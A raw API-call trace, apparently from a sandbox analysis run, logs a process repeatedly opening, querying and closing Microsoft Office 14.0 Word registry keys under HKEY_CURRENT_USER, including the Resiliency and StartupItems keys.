[0086.615] RegQueryInfoKeyW (in: hKey=0x43c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.615] RegOpenKeyExW (in: hKey=0x43c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x438) returned 0x0
[0086.615] RegCloseKey (hKey=0x43c) returned 0x0
[0086.615] RegQueryInfoKeyW (in: hKey=0x438, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.616] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0086.616] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.616] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x43c) returned 0x0
[0086.616] RegCloseKey (hKey=0x43c) returned 0x0
[0086.616] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x43c) returned 0x0
[0086.616] RegCloseKey (hKey=0x43c) returned 0x0
[0086.616] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x43c) returned 0x0
[0086.616] RegCloseKey (hKey=0x43c) returned 0x0
[0086.616] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.616] RegCloseKey (hKey=0x43c) returned 0x0
[0086.616] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.616] RegCloseKey (hKey=0x43c) returned 0x0
[0086.617] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x43c) returned 0x0
[0086.617] RegCloseKey (hKey=0x43c) returned 0x0
[0086.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x43c) returned 0x0
[0086.621] RegCloseKey (hKey=0x43c) returned 0x0
[0086.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x43c) returned 0x0
[0086.621] RegCloseKey (hKey=0x43c) returned 0x0
[0086.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.621] RegCloseKey (hKey=0x43c) returned 0x0
[0086.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.621] RegCloseKey (hKey=0x43c) returned 0x0
[0086.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x43c) returned 0x0
[0086.621] RegCloseKey (hKey=0x43c) returned 0x0
[0086.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x43c) returned 0x0
[0086.621] RegCloseKey (hKey=0x43c) returned 0x0
[0086.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x43c) returned 0x0
[0086.621] RegCloseKey (hKey=0x43c) returned 0x0
[0086.622] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.622] RegCloseKey (hKey=0x43c) returned 0x0
[0086.622] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.622] RegCloseKey (hKey=0x43c) returned 0x0
[0086.622] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x43c) returned 0x0
[0086.622] RegCloseKey (hKey=0x43c) returned 0x0
[0086.622] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x43c) returned 0x0
[0086.622] RegCloseKey (hKey=0x43c) returned 0x0
[0086.622] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x43c) returned 0x0
[0086.622] RegCloseKey (hKey=0x43c) returned 0x0
[0086.622] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.622] RegCloseKey (hKey=0x43c) returned 0x0
[0086.622] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.622] RegCloseKey (hKey=0x43c) returned 0x0
[0086.622] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x43c) returned 0x0
[0086.623] RegCloseKey (hKey=0x43c) returned 0x0
[0086.623] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x43c) returned 0x0
[0086.623] RegCloseKey (hKey=0x43c) returned 0x0
[0086.623] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x0) returned 0x2
[0086.623] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.623] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x43c) returned 0x0
[0086.623] RegQueryInfoKeyW (in: hKey=0x43c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.623] RegOpenKeyExW (in: hKey=0x43c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x440) returned 0x0
[0086.623] RegCloseKey (hKey=0x43c) returned 0x0
[0086.623] RegQueryInfoKeyW (in: hKey=0x440, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.624] RegOpenKeyExW (in: hKey=0x440, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x43c) returned 0x0
[0086.624] RegCloseKey (hKey=0x440) returned 0x0
[0086.624] RegQueryInfoKeyW (in: hKey=0x43c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.624] RegOpenKeyExW (in: hKey=0x43c, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x440) returned 0x0
[0086.624] RegCloseKey (hKey=0x43c) returned 0x0
[0086.624] RegQueryInfoKeyW (in: hKey=0x440, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.624] RegOpenKeyExW (in: hKey=0x440, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x43c) returned 0x0
[0086.624] RegCloseKey (hKey=0x440) returned 0x0
[0086.624] RegQueryInfoKeyW (in: hKey=0x43c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.624] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x0) returned 0x2
[0086.624] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.624] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x440) returned 0x0
[0086.624] RegQueryInfoKeyW (in: hKey=0x440, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.624] RegOpenKeyExW (in: hKey=0x440, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x444) returned 0x0
[0086.625] RegCloseKey (hKey=0x440) returned 0x0
[0086.625] RegQueryInfoKeyW (in: hKey=0x444, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.625] RegOpenKeyExW (in: hKey=0x444, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x440) returned 0x0
[0086.625] RegCloseKey (hKey=0x444) returned 0x0
[0086.625] RegQueryInfoKeyW (in: hKey=0x440, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.625] RegOpenKeyExW (in: hKey=0x440, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x444) returned 0x0
[0086.625] RegCloseKey (hKey=0x440) returned 0x0
[0086.625] RegQueryInfoKeyW (in: hKey=0x444, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.625] RegOpenKeyExW (in: hKey=0x444, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x440) returned 0x0
[0086.625] RegCloseKey (hKey=0x444) returned 0x0
[0086.625] RegQueryInfoKeyW (in: hKey=0x440, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.625] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x0) returned 0x2
[0086.625] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.625] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x0) returned 0x2
[0086.625] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.626] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x444) returned 0x0
[0086.626] RegQueryInfoKeyW (in: hKey=0x444, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.626] RegOpenKeyExW (in: hKey=0x444, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x448) returned 0x0
[0086.626] RegCloseKey (hKey=0x444) returned 0x0
[0086.626] RegQueryInfoKeyW (in: hKey=0x448, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.626] RegOpenKeyExW (in: hKey=0x448, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x444) returned 0x0
[0086.626] RegCloseKey (hKey=0x448) returned 0x0
[0086.626] RegQueryInfoKeyW (in: hKey=0x444, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.626] RegOpenKeyExW (in: hKey=0x444, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x448) returned 0x0
[0086.626] RegCloseKey (hKey=0x444) returned 0x0
[0086.626] RegQueryInfoKeyW (in: hKey=0x448, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.626] RegOpenKeyExW (in: hKey=0x448, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x444) returned 0x0
[0086.626] RegCloseKey (hKey=0x448) returned 0x0
[0086.626] RegQueryInfoKeyW (in: hKey=0x444, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.626] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x0) returned 0x2
[0086.627] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.627] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x448) returned 0x0
